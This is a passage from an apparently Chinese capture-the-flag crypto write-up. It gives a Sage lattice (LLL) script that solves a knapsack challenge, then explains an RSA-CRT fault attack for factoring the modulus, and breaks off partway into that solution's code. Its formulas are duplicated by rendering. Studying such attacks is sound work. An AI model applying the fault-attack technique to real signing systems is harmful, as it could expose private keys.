4864818797093722623565677685859543973390112830746624055229533980806776797841282904975131115728026803370048220557163543280992869290309791921228434049251178164637297937040131199463481195381628854238472825207574252067913908248660229385555185853538989480140391767660947306626398553539035746147259767628740867379, 3161787699578209483398863966171574085800635014128618281069563213206491139896398725138401190924103380258144500400444191578719345607242184278747274258431096616541747130659309432467444964436941932912647227442238382897607930968121886411288976594859363208205500851000281213182502397430622427506016546702993920598, 298936111455916005218319008405498717611617206825419328764919507634781850865643086543658723113013059332332515037159152035147012122206490359380372519214253467377146785292907463008070756054363482547197711643996345110028452271850528733915118279277302020161978349315111904197316775887346230256622881306838809598, 1072212344704631655474954308119162944844783442352702067020093741716856174227794280955629713582124285411428110142615233404173709848026131091094306581152880945100698521211222247014933458492734615327271426631906098036666571266527551643593171419805865196273051129160931149501509925183932164684199881914280377140, 2704603728678150989739629605767277626393066999988922361667395961484552907953743812609344420007381913705970957002217890478711230485530220552082885949328288933475780354432537807798027185999439278140266935184724579192801211194740637696931407560425496930767876168566978497180100702724606737995026812851175151510, 4793048963983285365005630459828954488780124123937942409754176935581598672142822294927673059305899145568699731401578980488159388936046157856965265094385066281892574219829063322270522205699605211496801852779518325215030944476690737731348005121894471899844160281349383517409942365449632780346946938731608159424, 1859715936548646455845419479413178774422312985161950374310130269210148733228044627922648764836593293085715379921477975375033182460425533397485516496551383631702651977205214444528722505057805558620731218084651615119945720889734091937054340048214264736342087083334752569796937128093477294860551948823452070802, 2648653405519055563126120033949348770756958365652864010894018479949711010413634771271241270383695927072819473571955357613380794319411272268572615127345824584605817747993049763944584243046253788464735802533475289716726507011169200697819718574060731207016285701812297751905225709420388100231676042361527085631, 902399298528354831910617470499214664684764758377829789392397731484779292882695897690062070317670746517421702463073709757004373498967146698337237097418260734696122218108596174548759370787549119701575128821002178353650005369953728593594289946773399147443652389240316701136809543256059764098745292677374518322, 690202668676538791210603664568631799860588923280022553694882985966578444630499783656365551101450274457969429411651124855225200947313288560919019894653392757215873733341509385539801862996443002340649242191303392708881934423129952735852647693058374431625505773494480938105099315643819150066054487736622871141, 62238787432522887534200603192360089622062946091585102713674006904641141886029293066518680270392099434924969158754889024745942371154076898632050465027708402577439328499071844298914060955646068460492239891682602476755456621671722394287077314933390101676863980939291156676325336514171930867856508595487692145, 4498581815207429220335336234723411109719272173854990468988522062805955969918153416657532640400384519206627851513541518299521870417380935969587733563542292037367915041845330412114022778335157644792327106050648499546694994002498826488323373364550931922886104426049916834204671448918161434198869904124403278995, 137919517222077357958721039648537998710746338888619918310003966073654001951559043579951686492648475255168671678920972418237222073230785420357747079126552659919189779571908592758404061765285798681316786778803951576058254892529353960308277484316432278588798175607364924362064461157663121274302341293234554295, 963320951682746474948918340221934619633678838056946552807161203764147617332064268096801220902845408313508368961258405214620950881290140055648845713715332647144747225171523092505682498174376999458059078149909864464322591445769117764684416698286436252489848360749644537840466325440337825677763722793716864623, 4885602959986614652377424535547189116300277964310401095260572199856818264420985915168391676715081237571987012608140953037062551063327034601236310960718242243451886444459246219537697345635971045611224448418773940984503512378817787729668322287171390150300146863780647810273375601755353825561961908527177311181, 2590009580290883045573418540941311938753759633204231433083861843364502013472411498943442961976853913144939790786678173696377721960076101642153679207720260195752937341089964488972962640556198263318293219221394310072139874140537743489762817011091009107411982792043751159922556996853646244357653004507214597058, 1638336479121628186217591304292595119981887813505325501571927265176958614759234284932252533500015984404886180003283900360346486921159127613007201740197512184281567461775471315597257551762280142845910630840299947810921442472246518300677770137177223950966518178001466063823539285012493058707147368364332115164, 1516643878817907245558142590275742404111377739383508867465577340757896542806545387233431663180817336078283867831082565562665279549432357526775110561376728878859177720496058548565124439257502970340180532953383978926785728994825484050669558706850212255873635477670086058811856907415283430515533172487399378274, 3571575919774843795809987590634639992815093753350989111959747273533418855538915042427620624165146576499947452197498902305144952906262280122195759801605730303129760600738689199013160480690981795041883223111870567112890598671951648983741013067130856018508187664971392384261967897957026323815896861673800213699, 4892405224139405138388846809089270235911462164325537891486888642227446473345997460358743147467633475796545722341227988141409434486523866294518661075106562286153413152233306430442827829632967492313744232679328416137838315917602104151324368262957064766286604952788401496240916745109772787628981439323531837299, 4139350868482375358339910066853624024531327148056190749175082564010988743823574777152016307130426492927014525748065673178492880993420444133796587940917806554700273235145284394241723674331148211661726146595019992296609552930439784043166676085772198609820124502036007205921413995690204616816567543919980160811, 2230383020979284880891905031743834227634535315823157418422883748851534397712332186516575856971368454910657925518011118669868163044897919515357026516058294821818050772766219517313345668759905094278321760037810704275127080345478458330191026003003979270067445682814573085218396067178577972486225156585166908357, 600717652933852348785246481199088283108667005937624855304433140679453331083355624248530716724543658308743710695407144109366744474306911650526299722212721798603058665309743574106143736804538659126858220138644486645359248829113324069217677121341197941443376697792885174330761793247161646365337801457957353844, 3874769500068113810375777753884262810866197220705226526123994576906003186414997192360044004832042036453504148948662280692119219086523474160158739574928869693520833949650734363282471581031494818511158828241471233101695653444448087750082973343427750452390768076850353785544751632497603206700449774872192194338, 2072368176937193613059026532688722155730088741184556280298605967854670610282377376328901352435510310588270572248759041546929204649260736099372300574456612007738840615023991077102796460490561053319384753051666140994311715140505170420218926658750165107170709888130219894717927374586081756783981173350944564221, 3785376083139098308225690314286115484579435805433563365120819944421108366180510529788157039129479454196614632666396226191252771458750237495289308484215387596080260948500737994578604935113142858051672458230870728071977189474943949521390971506914250381722727702146816621546824978358371856694431696766797444155, 1918537524331696381673070605791047667470286457618508299829910326378178061970538920679594027530639579124054900062429999836054481871528662115860102208152254307971184134474012376729074369205059116699757627578786205134190217248746066205229236747644594618823161878275036213477025746696759058880901648240233007086, 1817188767220833631271873639811871838479461092766186483843817261364747051499083639606567575261541777187985956040163261432895005949438845291636450615584137911535788845603450141149697113939818344011057818713886138243287812881489557492610496221323519132608143703624821322965021979541362291272917581690087374090, 3922832436064754882306286084489950978972139075898255929466337727544166204964518677738636809180382408786555594017425804508240627876380956970226542341557503689993125204111221879047903070112641107838797233555678772352866785661402004252572749534532488624261947127172892006840936477264194851238646563649868372470, 1369172038853042365190484148440142162789753563597497968554529636813520603906106681701728167343239759817105474912038981139503730405333681563855063743028140865210049255421785881304209585730747339032027988980222250401581198405994510128408811710945765532658538210862966628032697856674991614488049150366428932746, 2872153658264412654611555687243744986036785021082407940384979752537666878505435964981268889150240861442814518871134623595209963585363657941485769244302032634649984945826087676348791230773749782013983567849673455391637779724751448933223036801548903964391064175456151993427593782992231866341674542090889328365, 3403581544647423496181251419291006976667793282808657346559237885682754795671832923277242795311408422813974295694067272350645456650185197748356514094239126166374601112948085251629310981516117728928786160191013142279197371152949445446894344235205848260714968669966620932215451878316165188813314361731645572840, 114355431206069696052703164409809845400928892821930230606522048914429550319009631243682339063294268976111042752290065555633095585151400072485235493965173290422232657739238559237292310527724092241669210083714237120389817088468776797225868423104343003029719975341337062226735428033783215460493810206799461435, 4628278382511905568764115125918080241144313522718524305785873007473657851969789269703210612516923893435002543993224500380143432890234340014035623934799527424444574779873350607226083576387848014667471723321298799826227601667220533224737762236028003916037934129002515719433476758436360151754218072782267852620, 3457157904052048579481501455935122077426745612804831662131581431545810594868989831508763636519254897653864111608376481441448126148469837986784008967467164463666314348276705247708104436367927475653329874419266596650147330530230861344470728346811425764032117401499917565760390152924363173307490763028118717681, 708489706494584706162487350936181857223079805545505537653091286633163600660318039024004247129003454337133124480221653477918583706532045567501389939287513275762882918562196080535461911324333973107927333100246666103546894439736276751669470247973767144802298488283931470507455968141044564525866074547636011164, 1659010945387796591620207981869259809034975515936124476648814012804306644668750636522042094295869445965547000530174881982002234941875379968678830139280937470868217746099921622973084741537970518892118865465005641049661370341652156131474456562160697023569541373895951887828802224660800352185747398417879864000, 3716858826349234519275810714121370859528489416553942371753890478806758607100907266335145603936571586496062463532671570706197017003040332271928905377375425700844554047917607401918527147456574369275236102292356739852338131283526560211973701318272557812388446033823998469199281365800548915873699385424236123449, 2863589395267786978277806264539367793486766422210907027750783889160759461955663097183512549316722540264894507167939475607291506709477168209227666575390441008367160986099060651162443380779388712986754258084704559783116552287421875165798613648970917253742883669864215319152610707073677356224350198731815545290, 238408066767118076826163734573702979875876234154045695680072501075171678246219587159894494836027299662332588559091082755025722986592156432761122568272693309223165224928373392425103833983258133355995041538928024338386937505431117580068686175327437045473055345936350849514632977150213212303008166299213049459, 70197552317727866028266168479763438693677854547447328876283741160869192682241149080578692647555541218548194703606376327316783061442656261069907680122470557402126144256956154687666973511956188791063861700741764442994015577724689139699026738671019636029741899353734668091736026785048542276099183277497018150, 4544940994365366486602973415852612958825572671941377289753132448185548619277957842883861034953982978615836951363115574484302885251104786265936101256114493001480261369815029677933733346809687814140970528298914049959095425128844618356134235998805620108974822247678663275231407960590929500086759413779275582266, 347288239710827917102883942729192380922431937494378558168991141286786705550195350928713198735231964588141816428846107942013838283761152189327562495268674671484996676135254580544898480581931351163489522958862679365720420782735743219253703312589991277947312231417235248175665908350512767051354728591531769958, 670312358589783873754252327861330102026365609268888787802990853581468555369370102685378771519859186644440920011625687868117015851422916538341850709050565747700425765556716656791334483823216985400089209070529865962269376378878035935906731300851739515458756617682957096547265976494259784934442799959692127514, 4701410383995673142942304321848017424074968137089370243487077019056062315092008079902663769392803238389314718095905251307989379885082225169181633653469254470231092618821522912314961071764042088175163130381277703500567000538394973066122981404110360903491803511388351566319791000234114850972732806181459057717, 2508474993491252774504248340792337172754378435767670446108589528269923687018363215718027101280121124890210414232033038073675216316135041681126623184239887060613337706076805037339834016100997510939270609104679251229541986896258932328733771602725977148245221939445942473170347013740618435010015599591338668531, 3529875203842009355716956568129668140779736916099845705328569337807909580905936209443291368433207056261435179057805326314875839704293952791228853092249760413033607694663452994578650473182110792010600561574406440879538471115531994960940933714437267031731576003999872207013523053324644977052236956312247949047, 514100785207810772232304492110289285660577118135772555763973678868447050637641610984309242707161367822469534946473981623735841552592701021755166777366859744362731190489910612638305143643044049083910703525065196400676431965075860095129559122166306872278155249131289822509619620288737682252798457501988812974, 1339937085447112435727749903317416985769855951244611858247300707868717606717260722306172167757212235371079720858582612142286628514096164472191184862990388816192128868630938912850906936041819167344519739398691297379631088333114097546488950971484285612573698568407315994458433250339595921274168408176650192191, 3484700605261320030470889746513840904958093438446988233913308229650579154379084670210311100454190034073160421440191629935709869170269099095399390895975459919441816790722631776895604990863375141068189013082934815382788564182899127378226851334116849625091722654065356580696683212726740610827340700587289852755, 1964978519523685458040210085245870721052042309393673592964898007348621402116470821744177415295728276401626629648679635257349485298176599678187606779407225829923078899809858735948346435512762938860670720986101660296100805137097704900442836373723914987868854046278607935460140003549074714855283526371996083920, 1446173182880648128021149885621736201961260705283040227178362309943417020701319515762979565059657458189671657957926973875677736831658787252815152856082570583059993343583056045288543263598221910654088405423122332910314966505670240794477296829425542884653594109880223962948342618443955797438871280890312689824, 4518040907200381766302937431227065679569370214334448679719944429716965969752218161777766059512526154216872967027633785750196234997014870541035078982016613606526683923891434621391144754102328208839980205975514179102768798434168752113309888819895108066725721189674367770146477350030654698866579548052991884847, 2854313933136268843356059129162195733439888799285636904573940347527318124624470103983799790288141153410621478399400064715382346957781375119245919660361830090987478838771947462350421286344990657804330824608993151034750833407871448166558855370486157814822355960573064398386435763644788458643643444036207665910, 2775385117060746223662727663369180641513374051979154884563312026253846787926229790998667289531555672019242497573758645579587973129573238204369518829311314398646052797552243510475097729518391123871676209637421245861926574094620583417800474414797769338900240123282369016685209618306536295276255228825934257758, 839455001952454520949446940864085043350458061086690925249684484893025062028863023702735062015092562082059952191937526935456894307000438254101049160111024803524621244658775227270319018591026722889280194855133382841112050441867401321300789169104030741842170008942677193292471399636671716204235209188788677232, 3908035558720849196955259883966629596556121536067432017885747702393138634254718866731014166334012572814495374824338841660943694327787690127331038729194031686837302369134368923848185874177883027067827532278068117662494640329385302967271336339741532856654397820260006464178023996907872386352715390127449855124, 110608779275033133446563493593929805259195595214917145289762501109512529779202352734185127949055109268570315216084589983586822235335972979563511910316011360204616883770788362617589499422502130063407893989381748170922649882104748290455006646031075302527958390476981182562373916060822760215210750975608793894, 4064885970448151543853236263168231852254663621014776566739215252321620939546047007097918927746096348032290006966732116584030756859276558117358201891880562572203473268241908637820350719250732115205978323746912787672814245832726454744768350383611959444354541999674256917453868414908191532556695734015521263882, 3726303214991394833795101721726087234399437946067796408260761472144225221929148776164707369412249820839787324836385615824924493255046641975546322896703591249880547136675736647860981294488098417650649117751916662432544251104258041436938474210976142840511938467518520202598202006976901917397328186425497522412, 3825554658337418777552793226601119070145271399355917645851662512053926171857646367392850363910813345609885384703374128129921901222140856809098519775164469520821424531063247402290531803175182101075940326275017754687014420870259489062502596898069095746914628463421728503702375403383776249882376086695326571189, 465953566058227381783916421203554792603376780657186023894743972802857022292127916173242368943307429220796690300343735422497507513443387572813668292617291673965224294828604907272176628792543229774038157293791924684173766783351307505489661110790857647552982529427720453329793018457745621054015130906664155124, 622222064692577653917829052843975556159483871035466631268835035044634107713016036836001081072444215898076403620864800781592406189008223204400201297741534300561602503366440622272760165202034737263022668083121527813047627655094333586597960819574329979363123028366783363071556994118942348087157808058712768022, 4765455319349831648410707997446554343220825590111058938555927228227853997635168833848457344205883823499496724476221863161825015996928449585492733250163128921126704895897486084992993741652803331126536667190993359104575981423650170843220797970439860596432791932914520473696152171684083060274828560136572748185, 2310469780073393411599511864080618852720733817538038162612389544246560899618516529314314936884384098681602552101121343890473696337038307223665209832292306952767355155574454165803339570730266508519590525848471375217581701907804789045429378115436645098728730047488730913493846258131596661221218619848964560190, 2418080226925438656334420863500465278365628144689728767282735411551196374087466150915767502890676678231420120639060595548294922253222920822659058096854623577549304376409762496674573589613574202275130257622471290270030615716565484444267628444518943797107290090804055918967192164349286500315726991579519224288, 1018010121557142814859857579953951295372851736017103098741296134040428122885938802823874726645513250102222734656477000500282919566760423517750060814361533352194919068089859265043580497447430427077295026801246103620931532095064167345191003430094128259718159324493729236088290107280828566420372088116304162996, 1401030423193870394639326301210243533014467110522721232642647462538515934280863624076201998026609561027681417928965200050103672267361160630360793673508195728003673696283496190475928271241844835436935484895993395459706029493840847402801021230517797327143193670383537868835972317679554486034423287523167511829, 1490041383412215198506274867934299781584567039508645411053495792045933428164990155262476495011759255001511853788151266365119844416882886245309710185319903661588150094818241400749381511442293299551826652717309215281520029793953874667885259046159879869946495676758549628723017620730404280397455899135307773132, 4475975181811685553254663397249408739770067915561731323205311511239916607939766300394455111855510866139587282845613862256728333398164368073832855871468062879212237502823325617168455413723948223438988004734934943119772108485694931428483463163414710814933650821863491547461713916842308249574436128348568133264, 4492210612448635996765505363488934224099871479032477339325361708956990359088024863598882313480226255647662790912463960926702383479414964633585961898837859768073997982619673944886719527894311811688519731240641246991956831280852625221873467843704134302272697329293617795320433943679474854345132270524338499593, 15558252678035118050932898438222155108110132984819125686844400994712677053530222643268204510150512562625889487835322200942375130235985213308805867973527998505828491068751591845205535926979905856685901183017961405716985781612459196261659406308947998810504276286596752746572825095487396856834291917314194998, 1635942608425968482827295759360171433157965152190102842644758338460551345567517118909270674561845214907737479667565744764685653652783339339770997531389589542933187044737108408807976603029813929808335104160942127292378039626848709307355314342094414655389607082842088033684222494008238073279590990550787428053, 2975070253897264270164828904550640573223407893435573791529519202694914437403261015406665725284365053275269833222850446455940086648585277305584015189910476596700361533167944174469720366155588887969797739897585911772836209509910132085857300260718667829621361012827046704171871395511396988442959643144730655121, 4741494236038901553750515482636578094801897145522057336728326126431026724855608165533162812590934023321457978432487562579310748011205460644594340283858270432962958023810559114667612965120894829557813854706315484057231521875384573185162936163627643783501054817877415423016370339324296419354346778659194542752, 3278171272062353454286322795035562196534290743592983893104564145274034269373293750756309310432316891528118148354149665853955941713606848929771833006460256315529079804549321182576023265299531936800829367661482684813675158632792062990528702628430078395219432878590054382725408093667005120463035705670518276629, 2095597170739334202470314322650477851496946384160731125826102996003542351901957046017760885529526526998228966360706974090830844650491530091317137355031428836567690411731495756314737343524691155373581748552663943002394063109927564564416717089014086239003881352824658822225782880488471672668796221582923257446, 1985430799472072955640188547354786954455515585992600280655151096157450050390523295162682551699730230139008589121150790851001973039659796551108954364404262133910624144635760861020394333404092556659892386108112095474168173134150970547178463603706698999784001209080803355841791502336737139098092626248724050324, 1829702481101765279004344145807086182416890562456613688494682728227034241025145086982363510257500136083133409602105763654404939055481191414912001030880022512334917264916534680677510940770660986856102337121351226791457839327793755608463624797215551893194685083720713257079733370855825231455623839222620082955, 4372286683999914020188718950843835659861701019028765326729214866795052073808383907913573736653351880781262491176404714367386817803594876414591790284169309085846621268443790419885186140478574976567498472559459286314446470177962253196612509671424218050487483010428904672163997739451465922748653672422730983253, 1302852773338128033265545922990923372302039523050267108862436786940478738904691588963975331355117078012982612520087441963094130625822620903289691783608495573218891486664387915216034045220850238110545009349777498733723020668428627535821333880886897176722721336771296438796883073310526128085192510621974031284, 2797858476110268723409931785265930452262478528508527724928054416567015499207314490284657921004774742454213555490635963172488494107085723916172210451582833477719251713549895632367882813926536102138043146913662036143269023907427722353256459665657391608086365841473231783296661798464212035662922595014282919396, 3160451912517138800532993410255164188737640347234712361945969879086984070903103048709468781982978801737742743155162677638750530331938991446902514099037485875699179819579208696978477952408474619362752965949052488251594154528819014785193999633493108661206449620891824821827459243289987759652957234826647187225, 2343708863693294629686375321495083341374200056583926660472076995722634792849052179173081034890630960886933206629268123634917565294504777671339447176571605914325430664654727254115827382784285730958380463792310663488802809762379392138586699162453788211659550025521448633891842772479921418951940222592478620215, 3489551799686288014334506698913604704941212738596120002937218055708652565098188012664680908547629982341982399217759878084629000348261330399077497218899428880631315947518112054469062919418605405442258802821673899213199301715250405346858463943050013410009318788899066341963052408736131679461278838522929928157, 311992848972810429298620275347492613075076919352585078541980572267000913811609935719282149934261199118214820144267795102479277827773370151338299538631029339902312413891476671621455673499240776515270228540791798156987913837827265050913602711347848782231803399026868779725595385682713519155153328075142157250, 4214347330947902257356668120670032761960657855315598419052037747046270730687099099995840138344857564924883354670864284436045946144458157407150189985344608928013420185532987375440271650265630795761171332405703795804935347385731277398954402289854990264937863183936940449456418843421641054049783756233069361548, 2940859266396484177046950297747035075581528261421780144745510868833940947436892884317945413009062195131282427353421843599435540870608533427082310371991448263668943446467012234235423224621306853322420530273310915514911199241940074056679489070615132714475376051992021926359767040433525538015681448999840130475, 548689545843352644706594817791916798935926169039949612045704475450748409508729185770761119838346781323621349389866236071081561399243404244714155141544648303063456319671299105257578289200256770470822584813536793412849716239639576718489840572112594326558415000296522178057568395086038325307977947444439726584, 3010616597194407843357011493768226311996779936020447680599396464433460244108289976495251354016971038921869723910916425767809708375534965449476533249836556148335824247603906528120471710941952696238835058653112630048672417388478352533277197269216843020568574350081644829259392323542558433211992623068567120587, 3019610623803670378150124109614457084136511463729400511468609742772703183421166088411788964693121054269684582033658538394387863801162935821173514211807416494847871639762883380956354585377141554057874693736782729284083109897025508501001221985388313011492622269308786778580954670467179237628723090772412112687, 3456892442153552825791351304104038574252790018688305404396377268819034645016022883066037914406379312585085969337036297593280070525728988705071614150752282245087432221796807382606733043785366663725628656854586223132978587170262523695339706648106798869652892275586447545122997251305483029423828330531593932862, 4193891264904205018508618416339352584671260177729807127300165581839925946177491654233681148389862986208122337311124542705343864452023225716889672253282837418417646614418628273445540560433330622877660601426976113551605853446006242952272663778843228585973128206825550195233913898539423600913183064577758873954, 2407092271751215972048043502815295352185546773516241547540131954393962881442406976192613695984710550047628104337671095096288562398963165175105174901769543681359221819469770919839838034620523681406907215858941019567615124144428620683169845150440718190806822128120550572037141734104550025816428879998161395163, 3039493550476778425543542809825749448025108635588378036955529285869960376586265197580300638984618329364749574427197025664340773190456890302653237300995205210799037105036662753909779737156938953274043780496298673796696943846964629986874922271810638448197816494264041708372669503914550421974946711031289926293, 272563939471171309959170153771634996960936135673271731788733495960344692381136945916942568786049312198257035504896323528724744795123861461584401188470438047784934122550029580208910854508579650208127645345281522103783955179458770893145740414884316390448589757892358377113946038280675011779670094858931334018, 1009306484453568367351135445283864445421400747416927875348113619041434905426995057429763003999714625833944790065110156236193433762496836449027911533918382496052921841906644845603304588558649147151365076560589315834895132427621448910997659366530383783672825207059749403704480478042078106649057810914947266177, 4542975725090092875265329818979113790789178531933797517500545146337069005944558101117748676928230913679806069499848090463410223317919708121280722248012871211479222012707693102896914646070681515255920654353954343673955865638894951048393803518037317279313188453889045850947444535024231435650445288167810547649, 454118457391449435805631087371879215687391516501736464944676591913727047323329789900878071826255762280125257514313836387097309893330938135058174163129007190618818722762276953753837663484704199446178647155456216547359467532221735289180135930858545044454711881070673869462577101957394519297680545708551682871, 1635702691731010191983942236732369682553721178949755326872380020576168419895627594750721768640028730725526766600288974800547044582100453085620162260228694559885129457259603249847460965670797863491108618898897657515386424594055752464965242098978185854850317501460275816296862145418447280844274646388414104618, 856474611501935545316620871366412156617051368883411272795003885724971371892129175681512202481819339179865345222683752128830134710440850381281509369656455971140851363726552596227501338928036581146133807719813913358706419049503859123205772834913280680673875610113990715806519852833617669284820587525172592303, 1184851695633196590859530896073053906108307787616752524429376482465869626210628976885827250056034383829298058194689386758516503610156407878349969493521298971808429815854303741756018364323387421074696755820552095597773436027425294236122929051268931281237544341614342480229020965356208060914322588066116834577, 436490649559079673833595532254393109895694521002624466739396689971968069439741668235067091621773920055394757920676172586718759162562223154846243292882123252749573459069094485250559254395147119777548007310781860371866041369226942788307752426438209927604209419711564771259072744340537465392020452342580959696, 4388537304133772715863925316641169075310249482820183896348626469192505828920208159671411483068230837953341786867798126172090049058711846929085459995896179765106731427761260844243991010221357209110209314936043522650394328902532384864309990120987592122633321068101325301231904078972595722775277294596713340213, 2393101447609058423972930395701691663427846813221239320934606678459413504768644926181460017799519382449397718313025961069893544988479646385919424405779326117178588032903929941862027150270119711598802163480952922120187094718686898939410748317800523138265797423665663221828132875519135258017417196723394991589, 2076619377477031848639856175879543470343734230329455509726069209675934720306012788659428906143908031714533138217029168088704862709255685909509412415865310492415529179862803114166904885039563512848807162958978688888862433736068791165778446148630009314317367780254227290580067976686185051291022979661750915754, 3491077294883860264163831470480731798100952316266751074114141651012550304283058960434530180849262526809044918444772385895477880956597558643610336430554267189540135235980259742427410947649578494040773591269499992232386779146605217149697181339334540183232972164203652901657790093101500810462049416615463177546, 1900282698989463723132580002213591610224600569598698293743548176893816262621986651465369623867470701906655323671861637049755140533957531464521427859781669543880016267139703210772613428562790216713087985891753909255158869760207735542707780506499364324239566426940858870670235658504146842251118347853718573687, 845835496189376653886150062538136220529949512316837843552683019639478239138823063495130985204374692468338372257263301271462502177444656561614715214184613422656425547782261460936839766389042333921944045616045486642969616735714861351814153114962802762127416684363023821783147694935652388700962068809263643389, 1692948566193147198415868174132947385960361457234775960996688163030768614452245060590761872803325778389788629611003585774682395160900493537852600395064146263629935684962163363737792411465123735249475890890275593935918443912139384104086401671117297441852839961645132964273067219203682142732326663844844075005, 3901970947731392475716050740298719400950276818247119306832129595796167756242376176561993909746155516755870152152426215315380852798393154894808746740712267603715980983656834079622454549206763317947354722296743984624987127611181689458009296361053627284630345662893605480665829929447703677978777309463029378417, 1577043788886187395642609069164097976028680286900550453860267666151053881614552629192152797547831199391087342194362363394388982584111597031153132134424331287494091263926113657497887818333781008531372953107929672293402747435497312779887642688714378020998413789750803772540267677934581148808295413525216136803, 3276002168563401469280187929611647305197543429976350427130738049281707438362184511160108432124838733957215323976050672988158715407342981430458842450708646678151269772750534404161450465011318453684449149908734823528246992684797781800055195681433678035768369610420102397884004628356347672352589330168248485654, 4411009177016980725472022463786638290635658962658405430390446282357905517369354153749556317880287891619728551571365291772228008250807956164974455402362384308494347027623477843175153409603882541941337758836671784172488496488754902131790649458047942214547960790875638234105693707598046416061433722602277417913, 726307210260821049373144992154409948345637635368877092819523015622922973757990798665952122937220928090928915580354873566840841334710321751558673510023725557920994744241558993161607005593746962259280610204185140150932218256262971149625050424081864893903080125492194257806289021889420725960087352176605476401, 3693547596900043741100931793124522047704999510924569121382660670034074764908100421156413899466991914742739196108134269694588165114035371129093570934464583558551757548295216503767696894203692851680949073578461575940202069273789808433835247367833648763742770751275454183762387380512531453133282161136891481929, 3665167482952187096160406260284763362510646804687123748116392784543398398279641171604017029973718130518368590622397871178112956392132585354286995099639634346724159039575980422514838700663255651434551797666622249188660622202211877423560216079734584070335703175927475594016858689649422345026726688518192776409, 3177225879939950395651618993805008222412532118788273586156368076266815187233402783969056213942565660008399569335649908751056924645159655412260822319346140671522760303386912674853426818989655804583118735050488807630342254022038941207363968463486349805992873818522316215108897954229670433933723727953745569923, 3779028950209214447433161167866672177270317911040016153565684362868472897920954128667548298875972509713229980453212868866709806350382879548859304441713862617068673359830166023396799623627580164606085346085586198750311774006643094309383771953620689844976832117988296867004302713999531851905939505561391164191, 1565404281114657156315837816758658026233033173060800317005770893567963194302658801484623389662992305672382398023818850068525864828775625430086172113834590761904637783666223747194948578977291563029119331359772126904299450508763826664055472843841614023374884939978267540166731011979458675326635019791695565262, 4590612706732938257980684733418322154816988549292312878809124257236458054000997655804894335759227339962003988227969894859099164186023473343838474896521750585481368380309987345243249527717514650369578965067712448623509794751079446662740247787522802157146979933561737569581462646401210202611137277719776325874, 4656134044766857450597560240558144676752410910811435167749159091161696894834586087615774989757513667092954856468407760017560542136316715670693777783679558119131401055537286285519362471310101802489073198581136126447904865719977268401545732467435790881584291255625228947956711968019016045126232778925003004330, 1302442060464287844140958699896819274375020008729351597230040891362445067421212462957400958722642791768192657008363675587123266689147607759102472970553121277399742938912421426476562987172511600083704255430238284187551952036180307899091818953207131942020689197031040878798574298241042445489355623641304509901, 1713371877870224703630049314762946474778920435955283834739126207078713464668904026594605513305271384038631655087342898588084451349187868588684801874090865404001866704899244865655209470792718001015037577763825373010785137282706266173729073167176023660411002299453317075113416538613782092969312114363570614517, 3637726819689145119298859324222689829348828654379242284522514186534374907105449951789577704447855700484656693611649650849292507621631154875853657102526884725384668206346033815730075251973202378946655675542205955142413874296868545263385884125877782563979657700695334466662362949444188725774579230310152088275, 2158102278530231087495034471822326358570676636562730292269287971780457035415439398154664393611400939934545917849558224030371421867959640393291189526256769127344213191071939008079603466136176333380110183758543653357694387470236768742232731622566892872043474084829437398364701172310088532750048770269284101440, 1357917511517266002753494995174534483863311462321496912444365910532975757440009039109426669425460450718165016869719113431933081156266889995971449973598815991564815927350509938427923107101552779751422733194897338044578854890945368216930911437462116835554456903232462472222161348181958293840928247406557674974, 2251018060294798208546405609149289070988382731157357021632370786567727415247731970083169483820553902016645411129588563627592996984294288337792592520936877108974148008787194317828561698272728745048340731096531990558473233518197391710380846601332446583691529730716812953431975867169637715185113349221752268933, 1482068954689822886842025936245442918811660979248644510861339518658861807617708511787281929243096751044401436667087259365497421213702452919894081994558259251364044857153958318631770890533563020667069772553910132699365629867005612637922185970987117180360664807199834536264073950978308314028235946030457178450]
n = len(k)
L = matrix.zero(n + 1)
for row, x in enumerate(k):    
    L[row, row] = 2    
    L[row, -1] = x
L[-1, :] = 1
L[-1, -1] = c
print(L.LLL())
data = """
-1   -1    1    1   -1   -1    1    1   -1   -1    1   -1   -1    1    1    1   -1   -1    
1    1    1    1   -1    1   -1   -1    1    1   -1   -1   -1    1   -1   -1   -1   -1   
1   -1   -1    1   -1    1    1   -1   -1    1    1    1   -1   -1    1    1    1    1   
-1    1   -1   -1   -1    1   -1    1    1    1   -1   -1   -1    1   -1    1    1    1   
-1   -1    1   -1    1    1   -1    1   -1   -1    1    1    1   -1   -1    1   -1   -1   
1    1   -1    1   -1    1   -1    1   -1   -1   -1   -1   -1    1   -1   -1   -1    1    
1   -1    1    1   -1   -1    1    1   -1    1   -1    1   -1   -1    1    1   -1    1 
1    1   -1   -1   -1    1   -1    1   -1    1   -1   -1    1    1    1   -1   -1    1
-1   -1   -1    1   -1    1    1    1   -1   -1    1   -1    1    1   -1    1   -1   -1  
1   -1   -1   -1   -1    1   -1   -1    1   -1   -1   -1    1    1    1   -1    1    1
1   -1   -1    1   -1   -1    1    1    1   -1   -1    1    1   -1   -1    1    1   -1
-1    1    1   -1   -1    1   -1   -1    1    1    1   -1   -1    1   -1   -1    1    1
1   -1   -1    1    1   -1    1    1    1   -1   -1    1   -1    1   -1    1    1   -1  
-1    1   -1    1    1    1    1   -1   -1    1    1    1   -1    1   -1   -1   -1   -1  
-1    1   -1    0""".strip('\n').split(" ")
flag = []
for t in data:    
    if t == "":        
        continue    
    if t == "-1":        
        flag.append('1')    
    else:        
        flag.append('0')
flag = "".join(flag)[:-1]
print(long_to_bytes(int(flag,2)))

eazy_crt

RSA-CRT fault attack
https://www.infocomm-journal.com/cjnis/article/2019/2096-109x/2096-109x-5-1-00030.shtml
S_=Sq+(qr2)(inverse(qr2,pr1)(SpSq)mod (pr1))S_{\_}=S_{q}+(q*r2)*(inverse(q*r2,p*r1)*(S_{p}-S_{q})mod\ (p*r1))
注意到,(qr2)(inverse(qr2,pr1)注意到,(q*r2)*(inverse(q*r2,p*r1)
所以,我们有S_=Spmod (pr1)所以,我们有S_{\_}=S_{p}mod\ (p*r1)
可得,S_=Spmod p可得,S_{\_}=S_{p}mod\ p
S_Spn=p,接下来找出Sp即可S_{\_}-S_{p}|n=p,接下来找出S_{p}即可
Sp=(m+getPrime(10))dpmod (pr1),可转化为模p下的SpS_{p}=(m+getPrime(10))^{dp}mod\ (p*r1),可转化为模p下的S_{p}
那么,(Sp)e=(m+x)mod pS_同理那么,(S_{p})^e=(m+x)mod\ p,S_{\_}同理
我们可得,(S_)emxn=p,所以需要对x进行爆破我们可得,(S_{\_})^e-m-x|n=p,所以需要对x进行爆破

from hashlib import *
from Crypto.Util.number import *

e = 65537
m = 2180240512138982889935733758776025289492848542072999905411903898302427496814336475436552230920326681809745778470583226987
